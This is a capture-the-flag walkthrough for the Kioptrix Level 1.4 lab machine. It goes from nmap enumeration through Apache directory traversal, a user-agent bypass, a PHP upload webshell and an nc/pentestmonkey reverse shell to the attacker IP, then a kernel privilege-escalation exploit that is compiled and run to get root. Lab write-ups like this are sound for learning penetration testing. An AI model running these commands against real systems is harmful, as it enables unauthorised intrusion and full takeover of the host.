Level 1.4

Kioptrix Level 1.4 (#5) Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/Level5 192.168.43.212
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 09:06 EDT
Nmap scan report for kioptrix2014 (192.168.43.212)
Host is up (0.00038s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden
MAC Address: 00:0C:29:D4:CB:84 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.54 seconds

Great! 2 open ports only! Lets check the port 80 first.

Exploit

It just shows the word It works! So I went to the inspect elements to see whether there is any interesting info.

Saw this and at the last there is a URL provided.

After playing around inside here and found nothing interesting. Found something from my friend who called it is a Directory Traversal exploit that available at exploit-db website.

Copy the provided query to our URL

Then, I went to Google search for FreeBSD Apache config file

By replacing the version of the Apache, we can get the config file.

Then, scroll to the bottom

We can see that it port 8080 actually can let us went through by using Mozilla4.0 user-agent.Allow from env=Mozilla4_browser

Well, there is nothing we can do until here. Let's check for port 8080.

We can't access it but as we know that if we use user-agent Mozilla4.0 then it should get us through. We can use BurpSuite to help us with this

By intercepting the traffic and we go to the Proxy -> Option panel -> Match and Replace and tick the Mozilla4.0 user-agent.

We can access after this.

This took me a lot of time to figure out how to exploit and get a reverse shell from it.

We can get the exploit from exploit-db.

As we can see from one of the lines of the exploit here, we can see that we can upload php file to the website by replacing the field section.

Then, looking at the exploit, we can see this

If exploit works successfully, we can navigate to /data

I click into one of the shell I've uploaded and type

?cmd=id at the back of the URL

lets get a reverse shell from it.

Tried using

nc -nv <IP> <Port>

nc -e /bin/bash <IP> <port>

Both failed.

So, I went to pentestmonkey and got this php-reverse-shell file.

Then nano to the extracted file and change the IP and port

then we can type

nc -nlvp 4444 < php-reverse-shell.php at our machine.

At the URL, we can type nc -nv 192.168.43.182 4444 > php-reverse-shell.php

Navigate back to the /data then we will see one folder is uploaded

On our machine, type again nc -nlvp 4444

and click on the file we just uploaded, then we will get the shell from it

Privilege Escalation

type uname -a and we can see what kernal version this machine is using

Then, go to searchsploit and find the exploit.

After trying, we know that this machine doesn't have wget, we can use nc to transfer the file

Navigate to /tmp

On our machine, type

nc -nlvp 4444 < 26368.c

On victim machine, type

nc -nv 192.168.43.182 4444 > 26368.c

Then we can compile the file by typing

gcc 26368.c -o exploit

chmod +x exploit

run the exploit ./exploit

Then, type /bin/csh -i

You got root !

Congratulation !

PreviousLevel 1.3NextSymfonos

Last updated